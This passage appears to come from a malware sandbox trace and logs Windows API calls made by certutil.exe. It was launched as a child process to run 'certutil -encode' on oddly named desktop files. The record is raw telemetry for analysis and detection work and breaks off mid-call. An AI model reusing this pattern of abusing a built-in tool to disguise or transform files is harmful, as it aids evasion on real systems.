WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xc9ceade3a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xc9ceade354, lpReserved=0x0 | out: lpBuffer=0xc9ceade3a0*, lpNumberOfCharsWritten=0xc9ceade354*=0x1) returned 1 [0219.766] LocalFree (hMem=0x260d41d2dd0) returned 0x0 [0219.766] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0219.766] _vsnwprintf (in: _Buffer=0xc9ceadf418, _BufferCount=0xb, _Format="%d", _ArgList=0xc9ceadf408 | out: _Buffer="2022") returned 4 [0219.766] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xc9ceadf1d0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0219.766] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x260d41aab50 [0219.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.766] _vsnwprintf (in: _Buffer=0xc9ceade400, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xc9ceadf458 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0219.766] GetFileType (hFile=0x50) returned 0x2 [0219.767] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xc9ceade400*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xc9ceade3b4, lpReserved=0x0 | out: lpBuffer=0xc9ceade400*, lpNumberOfCharsWritten=0xc9ceade3b4*=0x31) returned 1 [0219.767] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.767] _vsnwprintf (in: _Buffer=0xc9ceade400, _BufferCount=0x1ff, _Format="\n", _ArgList=0xc9ceadf458 | out: _Buffer="\n") returned 1 [0219.767] GetFileType (hFile=0x50) returned 0x2 [0219.767] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xc9ceade400*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xc9ceade3b4, lpReserved=0x0 | out: lpBuffer=0xc9ceade400*, lpNumberOfCharsWritten=0xc9ceade3b4*=0x1) returned 1 [0219.771] LocalFree (hMem=0x0) returned 0x0 [0219.771] LocalFree (hMem=0x260d41ac090) returned 0x0 [0219.771] LocalFree (hMem=0x260d41a4440) returned 0x0 [0219.771] SetLastError (dwErrCode=0x80070716) [0219.771] _vsnwprintf (in: _Buffer=0xc9ceadf488, _BufferCount=0xb, _Format="%d", _ArgList=0xc9ceadf478 | out: _Buffer="511") returned 3 [0219.771] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xc9ceadf240, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0219.771] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x260d41cb7b0 [0219.771] PostQuitMessage (nExitCode=0) [0219.772] GetMessageW (in: lpMsg=0xc9ceadfa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xc9ceadfa80) returned 0 [0219.772] LocalFree (hMem=0x260d41bc2c0) returned 0x0 [0219.772] LocalFree (hMem=0x260d41cbae0) returned 0x0 [0219.772] LocalFree (hMem=0x0) returned 0x0 [0219.772] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0219.772] GetLastError () returned 0x7e [0219.772] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0219.772] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0219.773] DllMain () returned 0x1 [0219.773] LocalFree (hMem=0x260d41bc580) returned 0x0 [0219.773] LocalFree (hMem=0x260d41b5070) returned 0x0 [0219.773] LocalFree (hMem=0x260d41cb7e0) returned 0x0 [0219.773] LocalFree (hMem=0x260d41cba20) returned 0x0 [0219.773] LocalFree (hMem=0x260d41aab50) returned 0x0 [0219.773] LocalFree (hMem=0x260d41cb7b0) returned 0x0 [0219.773] LocalFree (hMem=0x260d41b2c90) returned 0x0 [0219.773] LocalFree (hMem=0x260d41b53d0) returned 0x0 [0219.773] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0219.773] GetLastError () returned 0x7e [0219.773] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0219.773] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0219.773] DllMain () returned 0x1 [0219.773] exit (_Code=0) Thread: id = 43 os_tid = 0x12a8 Process: id = "13" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x14a44000" os_pid = "0xd74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xd90 [0220.068] GetStartupInfoW (in: lpStartupInfo=0x94a752f830 | out: lpStartupInfo=0x94a752f830*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.070] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0220.071] __set_app_type (_Type=0x1) [0220.071] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0220.071] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0220.073] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0220.073] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0220.074] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0220.074] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0220.074] WerSetFlags () returned 0x0 [0220.074] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.074] __iob_func () returned 0x7ffcea2dea00 [0220.074] _fileno (_File=0x7ffcea2dea30) returned 1 [0220.075] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0220.075] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0220.076] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0220.076] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0220.076] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0220.076] GetConsoleOutputCP () returned 0x1b5 [0220.077] _vsnwprintf (in: _Buffer=0x94a752f7a0, _BufferCount=0xb, _Format=".%d", _ArgList=0x94a752f6c8 | out: _Buffer=".437") returned 4 [0220.077] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0220.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.077] GetFileType (hFile=0x50) returned 0x2 [0220.077] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0220.077] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0220.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.078] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0220.078] GetCommandLineW () returned="certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"" [0220.078] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x26d8f6bb5b0 [0220.078] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x26d8f6ac510 [0220.078] LocalFree (hMem=0x26d8f6bb5b0) returned 0x0 [0220.078] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x26d8f6ab830 [0220.078] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x26d8f6ab740 [0220.078] LocalFree (hMem=0x26d8f6ab830) returned 0x0 [0220.078] LocalFree (hMem=0x26d8f6ac510) returned 0x0 [0220.078] LocalFree (hMem=0x0) returned 0x0 [0220.078] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0220.078] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0220.079] GetCommandLineW () returned="certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"" [0220.079] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x26d8f6bb5b0 [0220.079] GetSystemTime (in: lpSystemTime=0x94a752f490 | out: lpSystemTime=0x94a752f490*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x36, wMilliseconds=0x26b)) [0220.079] SystemTimeToFileTime (in: lpSystemTime=0x94a752f490, lpFileTime=0x94a752f488 | out: lpFileTime=0x94a752f488) returned 1 [0220.079] FileTimeToLocalFileTime (in: lpFileTime=0x94a752f488, lpLocalFileTime=0x94a752f450 | out: lpLocalFileTime=0x94a752f450) returned 1 [0220.079] FileTimeToSystemTime (in: lpFileTime=0x94a752f450, lpSystemTime=0x94a752f1c0 | out: lpSystemTime=0x94a752f1c0) returned 1 [0220.079] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x94a752f1c0, lpFormat=0x0, lpDateStr=0x94a752f2d0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0220.080] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x94a752f1c0, lpFormat=0x0, lpTimeStr=0x94a752f1d0, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0220.080] _vsnwprintf (in: _Buffer=0x94a752f1de, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x94a752f1a8 | out: _Buffer=" 54.619s") returned 8 [0220.080] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x26d8f6bdcb0 [0220.080] SetLastError (dwErrCode=0x80070716) [0220.080] _vsnwprintf (in: _Buffer=0x94a752f258, _BufferCount=0xb, _Format="%d", _ArgList=0x94a752f248 | out: _Buffer="948") returned 3 [0220.080] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x94a752f010, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0220.080] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x26d8f6bb770 [0220.080] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x26d8f6c4c30 [0220.081] LocalFree (hMem=0x26d8f6bdcb0) returned 0x0 [0220.081] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x94a752f500 | out: lpSystemTimeAsFileTime=0x94a752f500*(dwLowDateTime=0xadc9825c, dwHighDateTime=0x1d6141f)) [0220.081] GetLocalTime (in: lpSystemTime=0x94a752f538 | out: lpSystemTime=0x94a752f538*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x36, wMilliseconds=0x26d)) [0220.081] SystemTimeToFileTime (in: lpSystemTime=0x94a752f538, lpFileTime=0x94a752f510 | out: lpFileTime=0x94a752f510) returned 1 [0220.081] CompareFileTime (lpFileTime1=0x94a752f510, lpFileTime2=0x94a752f500) returned 1 [0220.081] _vsnwprintf (in: _Buffer=0x94a752f548, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x94a752f4d8 | out: _Buffer="GMT + 2.00") returned 10 [0220.081] LocalFree (hMem=0x26d8f6bb5b0) returned 0x0 [0220.081] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0220.081] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0220.081] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0220.081] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0220.081] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0220.081] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x94a752f578 | out: _Buffer="10.0.15063.447") returned 14 [0220.081] GetACP () returned 0x4e4 [0220.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0220.082] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x26d8f6bb950 [0220.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x26d8f6bb950, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0220.082] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x26d8f6bde30 [0220.082] _vsnwprintf (in: _Buffer=0x26d8f6bde30, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x94a752f5c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0220.082] LocalFree (hMem=0x26d8f6bb950) returned 0x0 [0220.082] LocalFree (hMem=0x0) returned 0x0 [0220.082] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0220.082] GetACP () returned 0x4e4 [0220.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0220.082] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x26d8f6bba50 [0220.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x26d8f6bba50, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0220.082] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x26d8f6be0f0 [0220.082] _vsnwprintf (in: _Buffer=0x26d8f6be0f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x94a752f5c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0220.082] LocalFree (hMem=0x26d8f6bba50) returned 0x0 [0220.082] LocalFree (hMem=0x0) returned 0x0 [0220.082] GetACP () returned 0x4e4 [0220.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0220.082] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x26d8f6bb710 [0220.082] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x26d8f6bb710, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0220.082] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x26d8f6bde70 [0220.082] _vsnwprintf (in: _Buffer=0x26d8f6bde70, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x94a752f5f8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0220.082] LocalFree (hMem=0x26d8f6bb710) returned 0x0 [0220.082] LocalFree (hMem=0x26d8f6bde30) returned 0x0 [0220.082] LocalFree (hMem=0x26d8f6be0f0) returned 0x0 [0220.083] LocalFree (hMem=0x26d8f6bde70) returned 0x0 [0220.083] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0220.083] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0220.083] GetStockObject (i=0) returned 0x900010 [0220.083] RegisterClassW (lpWndClass=0x94a752f720) returned 0xc1a2 [0220.083] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1602be [0220.099] NtdllDefWindowProc_W () returned 0x0 [0220.099] NtdllDefWindowProc_W () returned 0x1 [0220.105] NtdllDefWindowProc_W () returned 0x0 [0220.113] UpdateWindow (hWnd=0x1602be) returned 1 [0220.113] PostMessageW (hWnd=0x1602be, Msg=0x400, wParam=0x0, lParam=0x26d8f6a217e) returned 1 [0220.113] GetMessageW (in: lpMsg=0x94a752f770, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x94a752f770) returned 1 [0220.113] TranslateMessage (lpMsg=0x94a752f770) returned 0 [0220.113] DispatchMessageW (lpMsg=0x94a752f770) returned 0x0 [0220.113] NtdllDefWindowProc_W () returned 0x0 [0220.113] GetMessageW (in: lpMsg=0x94a752f770, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x94a752f770) returned 1 [0220.113] TranslateMessage (lpMsg=0x94a752f770) returned 0 [0220.113] DispatchMessageW (lpMsg=0x94a752f770) returned 0x0 [0220.113] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x26d8f6a8520 [0220.114] LocalAlloc (uFlags=0x0, uBytes=0x6a) returned 0x26d8f6a9350 [0220.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0220.114] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0220.114] SetLastError (dwErrCode=0x80070716) [0220.114] _vsnwprintf (in: _Buffer=0x94a752f178, _BufferCount=0xb, _Format="%d", _ArgList=0x94a752f168 | out: _Buffer="465") returned 3 [0220.114] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x94a752ef30, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0220.114] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x26d8f6abb30 [0220.114] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0220.114] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0220.114] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x94a752ef10, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0220.114] GetLastError () returned 0xcb [0220.114] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0220.115] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0220.115] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0220.115] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0220.115] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0220.115] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0220.115] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0220.115] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0220.115] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0220.115] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0220.115] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0220.115] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0220.115] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0220.115] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0220.115] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0220.115] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0220.115] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0220.115] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0220.115] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0220.115] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0220.115] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0220.115] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x94a752ebd8 | out: phkResult=0x94a752ebd8*=0x23c) returned 0x0 [0220.115] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x26d8f6a5a20 [0220.115] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x94a752f148, lpData=0x94a752f178, lpcbData=0x94a752f140*=0x4 | out: lpType=0x94a752f148*=0x0, lpData=0x94a752f178*=0x0, lpcbData=0x94a752f140*=0x4) returned 0x2 [0220.115] LocalFree (hMem=0x26d8f6a5a20) returned 0x0 [0220.115] RegCloseKey (hKey=0x23c) returned 0x0 [0220.115] LocalFree (hMem=0x0) returned 0x0 [0220.116] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x26d8f6cf570 [0220.127] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0220.127] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0220.127] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0220.127] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0220.127] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0220.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0220.128] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x26d8f6d2e10 [0220.128] GetComputerNameW (in: lpBuffer=0x26d8f6d2e10, nSize=0x94a752f140 | out: lpBuffer="NQDPDE", nSize=0x94a752f140) returned 1 [0220.129] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x94a752f110 | out: lpBuffer=0x0, nSize=0x94a752f110) returned 0 [0220.129] GetLastError () returned 0xea [0220.129] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x26d8f6bb630 [0220.129] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x26d8f6bb630, nSize=0x94a752f110 | out: lpBuffer="NQdPdE", nSize=0x94a752f110) returned 1 [0220.129] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0220.133] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x26d8f6d3270, cbCertEncoded=0x1307e) returned 0x0 [0220.137] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x26d8f6d3270, cbCrlEncoded=0x1307e) returned 0x0 [0220.139] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x26d8f6d3270, cbEncoded=0x1307e, dwFlags=0x8000, pDecodePara=0x94a752eff0, pvStructInfo=0x94a752f080, pcbStructInfo=0x94a752f074 | out: pvStructInfo=0x94a752f080, pcbStructInfo=0x94a752f074) returned 0 [0220.139] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x26d8f6d3270, cbEncoded=0x1307e, dwFlags=0x8000, pDecodePara=0x94a752eff0, pvStructInfo=0x94a752f080, pcbStructInfo=0x94a752f074 | out: pvStructInfo=0x94a752f080, pcbStructInfo=0x94a752f074) returned 0 [0220.139] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x26d8f6d3270, cbEncoded=0x1307e, dwFlags=0x8000, pDecodePara=0x94a752eff0, pvStructInfo=0x94a752f080, pcbStructInfo=0x94a752f074 | out: pvStructInfo=0x94a752f080, pcbStructInfo=0x94a752f074) returned 0 [0220.139] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x26d8f6aef70 [0220.147] CryptMsgUpdate (hCryptMsg=0x26d8f6aef70, pbData=0x26d8f6d3270, cbData=0x1307e, fFinal=1) returned 0 [0220.147] GetLastError () returned 0x8009310b [0220.147] CryptMsgClose (hCryptMsg=0x26d8f6aef70) returned 1 [0220.147] GetFileAttributesExW (in: lpFileName="AiNxYR.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4.sister"), fInfoLevelId=0x0, lpFileInformation=0x94a752f0a0 | out: lpFileInformation=0x94a752f0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ac2b30, ftCreationTime.dwHighDateTime=0x1d5e8ea, ftLastAccessTime.dwLowDateTime=0x46178560, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x46178560, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x1307e)) returned 1 [0220.147] _vsnwprintf (in: _Buffer=0x94a752f0a8, _BufferCount=0xb, _Format="%d", _ArgList=0x94a752f098 | out: _Buffer="359") returned 3 [0220.147] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x94a752ee60, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0220.148] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x26d8f6d2d50 [0220.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.148] _vsnwprintf (in: _Buffer=0x94a752e090, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x94a752f0e8 | out: _Buffer="Input Length = 77950") returned 20 [0220.148] GetFileType (hFile=0x50) returned 0x2 [0220.148] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94a752e090*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x94a752e044, lpReserved=0x0 | out: lpBuffer=0x94a752e090*, 